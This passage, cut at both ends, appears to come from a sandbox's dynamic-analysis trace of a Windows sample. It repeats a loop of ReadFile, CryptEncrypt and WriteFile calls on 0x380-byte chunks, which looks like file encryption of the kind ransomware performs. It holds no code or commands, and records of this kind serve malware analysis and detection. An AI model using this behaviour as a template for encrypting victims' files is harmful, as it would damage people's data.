pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.604] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.604] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.604] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.605] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.605] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.605] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.605] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.605] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.605] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.605] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.606] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.606] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.606] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.606] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.606] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.606] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.607] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.607] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.607] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.607] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.607] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.607] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.607] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.608] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.608] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.608] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.608] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.608] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.608] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.609] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.609] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.609] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.609] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.609] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.609] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.609] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.610] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.610] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, 